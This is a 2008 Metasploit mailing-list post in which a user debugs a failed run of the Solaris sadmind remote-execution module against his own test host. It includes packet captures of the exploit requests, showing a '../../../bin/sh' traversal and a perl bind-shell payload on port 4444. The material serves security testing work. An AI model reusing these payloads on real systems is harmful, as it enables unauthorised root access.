Metasploit mailing list archives
Exploit failed: create failed (with solaris/sunrpc/solaris_sadmind_exec)
From: mail2arthur at gmail.com (arthur zhang)
Date: Wed, 2 Apr 2008 16:17:25 -0400
Thanks. I will check more on the target Solaris. I install from a set of
CD's marked as '10/01' so I believe it is vulnerable :)
bash-2.03$ showrev -p|grep -c 11
162
bash-2.03$ showrev -p|grep 11645
bash-2.03$ uname -a
SunOS nstest1 5.8 Generic_108529-11 i86pc i386 i86pc
TCPDUMP from my Kubuntu:
16:00:58.043121 IP 10.15.8.218.32818 > 10.15.10.15.32772: UDP, length 828
0x0000: 4500 0358 86c0 4000 4011 89ce 0a0f 08da E..X.. at .@.......
0x0010: 0a0f 0a0f 8032 8004 0344 2a5c a642 8805 .....2...D*\.B..
0x0020: 0000 0000 0000 0002 0001 8788 0000 000a ................
0x0030: 0000 0001 0000 0001 0000 0020 0000 0000 ................
0x0040: 0000 0009 6c6f 6361 6c68 6f73 7400 0000 ....localhost...
0x0050: 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0060: 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0070: 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0080: 0000 0006 0000 0000 0000 0000 0000 0000 ................
0x0090: 0000 0004 0000 0000 0000 0004 7f00 0001 ................
0x00a0: 0001 8788 0000 000a 0000 0004 7f00 0001 ................
0x00b0: 0001 8788 0000 000a 0000 0011 0000 001e ................
0x00c0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x00d0: 0000 0007 416d 6743 7853 6f00 0000 0006 ....AmgCxSo.....
0x00e0: 7379 7374 656d 0000 0000 000f 2e2e 2f2e system......../.
0x00f0: 2e2f 2e2e 2f62 696e 2f73 6800 0000 01aa ./../bin/sh.....
0x0100: 0000 000e 4144 4d5f 4657 5f56 4552 5349 ....ADM_FW_VERSI
0x0110: 4f4e 0000 0000 0003 0000 0004 0000 0001 ON..............
0x0120: 0000 0000 0000 0000 0000 0008 4144 4d5f ............ADM_
0x0130: 4c41 4e47 0000 0009 0000 0002 0000 0001 LANG............
0x0140: 4300 0000 0000 0000 0000 0000 0000 000d C...............
0x0150: 4144 4d5f 5245 5155 4553 5449 4400 0000 ADM_REQUESTID...
0x0160: 0000 0009 0000 0012 0000 0011 3030 3030 ............0000
0x0170: 393a 3030 3030 3030 3030 303a 3000 0000 9:000000000:0...
0x0180: 0000 0000 0000 0000 0000 0009 4144 4d5f ............ADM_
0x0190: 434c 4153 5300 0000 0000 0009 0000 0007 CLASS...........
0x01a0: 0000 0006 7379 7374 656d 0000 0000 0000 ....system......
0x01b0: 0000 0000 0000 000e 4144 4d5f 434c 4153 ........ADM_CLAS
0x01c0: 535f 5645 5253 0000 0000 0009 0000 0004 S_VERS..........
0x01d0: 0000 0003 322e 3100 0000 0000 0000 0000 ....2.1.........
0x01e0: 0000 000a 4144 4d5f 4d45 5448 4f44 0000 ....ADM_METHOD..
0x01f0: 0000 0009 0000 0010 0000 000f 2e2e 2f2e ............../.
0x0200: 2e2f 2e2e 2f62 696e 2f73 6800 0000 0000 ./../bin/sh.....
0x0210: 0000 0000 0000 0008 4144 4d5f 484f 5354 ........ADM_HOST
0x0220: 0000 0009 0000 0008 0000 0007 416d 6743 ............AmgC
0x0230: 7853 6f00 0000 0000 0000 0000 0000 000f xSo.............
0x0240: 4144 4d5f 434c 4945 4e54 5f48 4f53 5400 ADM_CLIENT_HOST.
0x0250: 0000 0009 0000 0008 0000 0007 416d 6743 ............AmgC
0x0260: 7853 6f00 0000 0000 0000 0000 0000 0011 xSo.............
0x0270: 4144 4d5f 434c 4945 4e54 5f44 4f4d 4149 ADM_CLIENT_DOMAI
0x0280: 4e00 0000 0000 0009 0000 0001 0000 0000 N...............
0x0290: 0000 0000 0000 0000 0000 0011 4144 4d5f ............ADM_
0x02a0: 5449 4d45 4f55 545f 5041 524d 5300 0000 TIMEOUT_PARMS...
0x02b0: 0000 0009 0000 001c 0000 001b 5454 4c3d ............TTL=
0x02c0: 3020 5054 4f3d 3230 2050 434e 543d 3220 0.PTO=20.PCNT=2.
0x02d0: 5044 4c59 3d33 3000 0000 0000 0000 0000 PDLY=30.........
0x02e0: 0000 0009 4144 4d5f 4645 4e43 4500 0000 ....ADM_FENCE...
0x02f0: 0000 0003 0000 0004 0000 0000 0000 0000 ................
0x0300: 0000 0000 0000 0001 5800 0000 0000 0009 ........X.......
0x0310: 0000 0003 0000 0002 2d63 0000 0000 0000 ........-c......
0x0320: 0000 0000 0000 0001 5900 0000 0000 0009 ........Y.......
0x0330: 0000 0005 0000 0004 7472 7565 0000 0000 ........true....
0x0340: 0000 0000 0000 0010 6e65 746d 6774 5f65 ........netmgt_e
0x0350: 6e64 6f66 6172 6773 ndofargs
16:00:58.050376 IP 10.15.10.15.32772 > 10.15.8.218.32818: UDP, length 332
0x0000: 4500 0168 5cf2 4000 ff11 f68b 0a0f 0a0f E..h\. at .........
0x0010: 0a0f 08da 8004 8032 0154 aabc a642 8805 .......2.T...B..
0x0020: 0000 0001 0000 0000 0000 0000 0000 0000 ................
0x0030: 0000 0000 0000 0002 0000 0170 0000 0125 ...........p...%
0x0040: 5b31 2c31 2c31 5d20 5365 6375 7269 7479 [1,1,1].Security
0x0050: 2065 7863 6570 7469 6f6e 206f 6e20 686f .exception.on.ho
0x0060: 7374 206e 7374 6573 7431 2e20 2055 5345 st.nstest1...USE
0x0070: 5220 4143 4345 5353 2044 454e 4945 442e R.ACCESS.DENIED.
0x0080: 0a54 6865 2072 6f6f 7420 6964 656e 7469 .The.root.identi
0x0090: 7479 2028 3029 726f 6f74 2e6c 6f63 616c ty.(0)root.local
0x00a0: 686f 7374 2077 6173 2072 6563 6569 7665 host.was.receive
0x00b0: 642c 2062 7574 2069 7420 6973 206e 6f74 d,.but.it.is.not
0x00c0: 0a74 6865 2072 6f6f 7420 6964 656e 7469 .the.root.identi
0x00d0: 7479 2076 616c 6964 206f 6e20 7468 6973 ty.valid.on.this
0x00e0: 2073 7973 7465 6d2e 2020 4973 2074 6869 .system...Is.thi
0x00f0: 7320 616e 0a61 7474 656d 7074 2074 6f20 s.an.attempt.to.
0x0100: 6578 6563 7574 6520 6120 7265 6d6f 7465 execute.a.remote
0x0110: 2066 756e 6374 696f 6e20 7768 696c 6520 .function.while.
0x0120: 7275 6e6e 696e 6720 6173 2072 6f6f 743f running.as.root?
0x0130: 0a28 4675 6e63 7469 6f6e 3a20 636c 6173 .(Function:.clas
0x0140: 7320 7379 7374 656d 2032 2e31 206d 6574 s.system.2.1.met
0x0150: 686f 6420 2e2e 2f2e 2e2f 2e2e 2f62 696e hod.../../../bin
0x0160: 2f73 6829 0a00 0000 /sh)....
16:00:58.057590 IP 10.15.8.218.32818 > 10.15.10.15.32772: UDP, length 984
0x0000: 4500 03f4 86c1 4000 4011 8931 0a0f 08da E..... at .@..1....
0x0010: 0a0f 0a0f 8032 8004 03e0 2af8 4090 7b3e .....2....*. at .{>
0x0020: 0000 0000 0000 0002 0001 8788 0000 000a ................
0x0030: 0000 0001 0000 0001 0000 0020 0000 0000 ................
0x0040: 0000 0009 6c6f 6361 6c68 6f73 7400 0000 ....localhost...
0x0050: 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0060: 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0070: 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0080: 0000 0006 0000 0000 0000 0000 0000 0000 ................
0x0090: 0000 0004 0000 0000 0000 0004 7f00 0001 ................
0x00a0: 0001 8788 0000 000a 0000 0004 7f00 0001 ................
0x00b0: 0001 8788 0000 000a 0000 0011 0000 001e ................
0x00c0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x00d0: 0000 0007 6e73 7465 7374 3100 0000 0006 ....nstest1.....
0x00e0: 7379 7374 656d 0000 0000 000f 2e2e 2f2e system......../.
0x00f0: 2e2f 2e2e 2f62 696e 2f73 6800 0000 0246 ./../bin/sh....F
0x0100: 0000 000e 4144 4d5f 4657 5f56 4552 5349 ....ADM_FW_VERSI
0x0110: 4f4e 0000 0000 0003 0000 0004 0000 0001 ON..............
0x0120: 0000 0000 0000 0000 0000 0008 4144 4d5f ............ADM_
0x0130: 4c41 4e47 0000 0009 0000 0002 0000 0001 LANG............
0x0140: 4300 0000 0000 0000 0000 0000 0000 000d C...............
0x0150: 4144 4d5f 5245 5155 4553 5449 4400 0000 ADM_REQUESTID...
0x0160: 0000 0009 0000 0012 0000 0011 3030 3030 ............0000
0x0170: 393a 3030 3030 3030 3030 303a 3000 0000 9:000000000:0...
0x0180: 0000 0000 0000 0000 0000 0009 4144 4d5f ............ADM_
0x0190: 434c 4153 5300 0000 0000 0009 0000 0007 CLASS...........
0x01a0: 0000 0006 7379 7374 656d 0000 0000 0000 ....system......
0x01b0: 0000 0000 0000 000e 4144 4d5f 434c 4153 ........ADM_CLAS
0x01c0: 535f 5645 5253 0000 0000 0009 0000 0004 S_VERS..........
0x01d0: 0000 0003 322e 3100 0000 0000 0000 0000 ....2.1.........
0x01e0: 0000 000a 4144 4d5f 4d45 5448 4f44 0000 ....ADM_METHOD..
0x01f0: 0000 0009 0000 0010 0000 000f 2e2e 2f2e ............../.
0x0200: 2e2f 2e2e 2f62 696e 2f73 6800 0000 0000 ./../bin/sh.....
0x0210: 0000 0000 0000 0008 4144 4d5f 484f 5354 ........ADM_HOST
0x0220: 0000 0009 0000 0008 0000 0007 6e73 7465 ............nste
0x0230: 7374 3100 0000 0000 0000 0000 0000 000f st1.............
0x0240: 4144 4d5f 434c 4945 4e54 5f48 4f53 5400 ADM_CLIENT_HOST.
0x0250: 0000 0009 0000 0008 0000 0007 6e73 7465 ............nste
0x0260: 7374 3100 0000 0000 0000 0000 0000 0011 st1.............
0x0270: 4144 4d5f 434c 4945 4e54 5f44 4f4d 4149 ADM_CLIENT_DOMAI
0x0280: 4e00 0000 0000 0009 0000 0001 0000 0000 N...............
0x0290: 0000 0000 0000 0000 0000 0011 4144 4d5f ............ADM_
0x02a0: 5449 4d45 4f55 545f 5041 524d 5300 0000 TIMEOUT_PARMS...
0x02b0: 0000 0009 0000 001c 0000 001b 5454 4c3d ............TTL=
0x02c0: 3020 5054 4f3d 3230 2050 434e 543d 3220 0.PTO=20.PCNT=2.
0x02d0: 5044 4c59 3d33 3000 0000 0000 0000 0000 PDLY=30.........
0x02e0: 0000 0009 4144 4d5f 4645 4e43 4500 0000 ....ADM_FENCE...
0x02f0: 0000 0003 0000 0004 0000 0000 0000 0000 ................
0x0300: 0000 0000 0000 0001 5800 0000 0000 0009 ........X.......
0x0310: 0000 0003 0000 0002 2d63 0000 0000 0000 ........-c......
0x0320: 0000 0000 0000 0001 5900 0000 0000 0009 ........Y.......
0x0330: 0000 00a0 0000 009f 7065 726c 202d 4d49 ........perl.-MI
0x0340: 4f20 2d65 2027 2470 3d66 6f72 6b28 293b O.-e.'$p=fork();
0x0350: 6578 6974 2c69 6624 703b 7768 696c 6528 exit,if$p;while(
0x0360: 2463 3d6e 6577 2049 4f3a 3a53 6f63 6b65 $c=new.IO::Socke
0x0370: 743a 3a49 4e45 5428 4c6f 6361 6c50 6f72 t::INET(LocalPor
0x0380: 742c 3434 3434 2c52 6575 7365 2c31 2c4c t,4444,Reuse,1,L
0x0390: 6973 7465 6e29 2d3e 6163 6365 7074 297b isten)->accept){
0x03a0: 247e 2d3e 6664 6f70 656e 2824 632c 7729 $~->fdopen($c,w)
0x03b0: 3b53 5444 494e 2d3e 6664 6f70 656e 2824 ;STDIN->fdopen($
0x03c0: 632c 7229 3b73 7973 7465 6d24 5f20 7768 c,r);system$_.wh
0x03d0: 696c 653c 3e7d 2700 0000 0000 0000 0000 ile<>}'.........
0x03e0: 0000 0010 6e65 746d 6774 5f65 6e64 6f66 ....netmgt_endof
0x03f0: 6172 6773 args
16:00:58.065047 IP 10.15.10.15.32772 > 10.15.8.218.32818: UDP, length 332
0x0000: 4500 0168 5cf3 4000 ff11 f68a 0a0f 0a0f E..h\. at .........
0x0010: 0a0f 08da 8004 8032 0154 1d36 4090 7b3e .......2.T.6 at .{>
0x0020: 0000 0001 0000 0000 0000 0000 0000 0000 ................
0x0030: 0000 0000 0000 0002 0000 0170 0000 0125 ...........p...%
0x0040: 5b31 2c31 2c31 5d20 5365 6375 7269 7479 [1,1,1].Security
0x0050: 2065 7863 6570 7469 6f6e 206f 6e20 686f .exception.on.ho
0x0060: 7374 206e 7374 6573 7431 2e20 2055 5345 st.nstest1...USE
0x0070: 5220 4143 4345 5353 2044 454e 4945 442e R.ACCESS.DENIED.
0x0080: 0a54 6865 2072 6f6f 7420 6964 656e 7469 .The.root.identi
0x0090: 7479 2028 3029 726f 6f74 2e6c 6f63 616c ty.(0)root.local
0x00a0: 686f 7374 2077 6173 2072 6563 6569 7665 host.was.receive
0x00b0: 642c 2062 7574 2069 7420 6973 206e 6f74 d,.but.it.is.not
0x00c0: 0a74 6865 2072 6f6f 7420 6964 656e 7469 .the.root.identi
0x00d0: 7479 2076 616c 6964 206f 6e20 7468 6973 ty.valid.on.this
0x00e0: 2073 7973 7465 6d2e 2020 4973 2074 6869 .system...Is.thi
0x00f0: 7320 616e 0a61 7474 656d 7074 2074 6f20 s.an.attempt.to.
0x0100: 6578 6563 7574 6520 6120 7265 6d6f 7465 execute.a.remote
0x0110: 2066 756e 6374 696f 6e20 7768 696c 6520 .function.while.
0x0120: 7275 6e6e 696e 6720 6173 2072 6f6f 743f running.as.root?
0x0130: 0a28 4675 6e63 7469 6f6e 3a20 636c 6173 .(Function:.clas
0x0140: 7320 7379 7374 656d 2032 2e31 206d 6574 s.system.2.1.met
0x0150: 686f 6420 2e2e 2f2e 2e2f 2e2e 2f62 696e hod.../../../bin
0x0160: 2f73 6829 0a00 0000 /sh)....
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://mail.metasploit.com/pipermail/framework/attachments/20080402/0379285f/attachment.htm>
Current thread:
- Exploit failed: create failed (with solaris/sunrpc/solaris_sadmind_exec) arthur zhang (Apr 02)
- Exploit failed: create failed (with solaris/sunrpc/solaris_sadmind_exec) mmiller at hick.org (Apr 02)
- Exploit failed: create failed (with solaris/sunrpc/solaris_sadmind_exec) arthur zhang (Apr 02)
- Exploit failed: create failed (with solaris/sunrpc/solaris_sadmind_exec) mmiller at hick.org (Apr 02)
- Exploit failed: create failed (with solaris/sunrpc/solaris_sadmind_exec) Daniel Clemens (Apr 02)
- Exploit failed: create failed (with solaris/sunrpc/solaris_sadmind_exec) arthur zhang (Apr 02)
- Exploit failed: create failed (with solaris/sunrpc/solaris_sadmind_exec) arthur zhang (Apr 02)
- Exploit failed: create failed (with solaris/sunrpc/solaris_sadmind_exec) H D Moore (Apr 02)
- Exploit failed: create failed (with solaris/sunrpc/solaris_sadmind_exec) arthur zhang (Apr 02)
- Exploit failed: create failed (with solaris/sunrpc/solaris_sadmind_exec) arthur zhang (Apr 02)
- Exploit failed: create failed (with solaris/sunrpc/solaris_sadmind_exec) mmiller at hick.org (Apr 02)